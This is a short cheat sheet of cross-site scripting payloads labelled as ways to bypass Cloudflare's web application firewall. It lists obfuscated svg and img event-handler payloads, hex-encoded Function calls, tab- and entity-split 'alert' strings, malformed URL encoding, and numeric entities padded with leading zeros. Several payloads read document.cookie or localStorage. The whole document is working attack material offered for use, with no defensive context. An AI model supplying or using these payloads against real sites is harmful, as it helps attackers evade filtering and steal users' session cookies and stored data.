Cloudflare XSS WAF #Bypass

<svg onx=() onload=(confirm)(1)>

<svg onx=() onload=(confirm)(document.cookie)>

<svg onx=() onload=(confirm)(JSON.stringify(localStorage))>

Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();

"><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie
%26%2300000000000000000041;

Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();

"><onx=[] onmouseover=prompt(1)>

Bypass cloudflare with incorrect url encoding :

<script>alert()</script> blocked
%2sscript%2ualert()%2s/script%2u -xss popup

New CloudFlare XSS Bypass! :

<svg onload=alert%26%230000000040"1")>

"Onx=() onMouSeoVer=prompt(1)>"Onx=[]
onMouSeoVer=prompt(1)>"/*/Onx=""//onfocus=prompt(1)>"//Onx=""/*/%01onfocus=prompt(1
)>"%01onClick=prompt(1)>"%2501onclick=prompt(1)>"onClick="(prompt)
(1)"Onclick="(prompt(1))"OnCliCk="(prompt`1`)"Onclick="([1].map(confirm))

Bypass Pop Up :
[1].map(confirm)'ale'+'rt'()a&Tab;l&Tab;e&Tab;r&Tab;t(1)prompt&lpar;1&rpar;prompt&#
40;1&#41;prompt%26%2300000000000000000040;1%26%2300000000000000000041;(prompt())
(prompt``)

Cloudflare XSS Bypass via add 8 or more superfluous leading zeros for dec and 7 or
more for hex.
Dec: <svg onload=prompt%26%230000000040document.domain)>

Hex: <svg onload=prompt%26%23x000000028;document.domain)>